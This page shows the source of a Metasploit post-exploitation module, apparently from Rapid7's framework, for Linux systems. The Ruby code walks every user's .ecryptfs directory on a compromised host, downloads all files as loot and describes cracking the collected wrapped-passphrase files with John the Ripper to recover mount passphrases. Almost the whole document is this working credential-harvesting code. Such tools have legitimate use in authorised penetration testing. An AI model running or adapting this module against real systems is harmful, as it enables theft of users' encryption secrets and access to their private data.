Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/linux/gather/ecryptfs_creds.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Unix89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Gather eCryptfs Metadata',14'Description' => %q{15This module will collect the contents of all users' .ecrypts directories on16the targeted machine. Collected "wrapped-passphrase" files can be17cracked with John the Ripper (JtR) to recover "mount passphrases".18},19'License' => MSF_LICENSE,20'Author' => ['Dhiru Kholia <dhiru[at]openwall.com>'],21'Platform' => ['linux'],22'SessionTypes' => ['shell']23)24)25end2627# This module is largely based on ssh_creds, gpg_creds and firefox_creds.rb.2829def run30print_status('Finding .ecryptfs directories')31paths = enum_user_directories.map { |d| d + '/.ecryptfs' }32# Array#select! is only in 1.933paths = paths.select { |d| directory?(d) }3435if paths.nil? || paths.empty?36print_error('No users found with a .ecryptfs directory')37return38end3940download_loot(paths)41end4243def download_loot(paths)44print_status("Looting #{paths.count} directories")45paths.each do |path|46path.chomp!47sep = '/'48files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)4950files.each do |file|51target = "#{path}#{sep}#{file}"52if directory?(target)53next54end5556print_status("Downloading #{path}#{sep}#{file} -> #{file}")57data = read_file(target)58file = file.split(sep).last59loot_path = store_loot("ecryptfs.#{file}", 'text/plain', session, data,60nil, "eCryptfs #{file} File")61print_good("File stored in: #{loot_path}")62end63end64end65end666768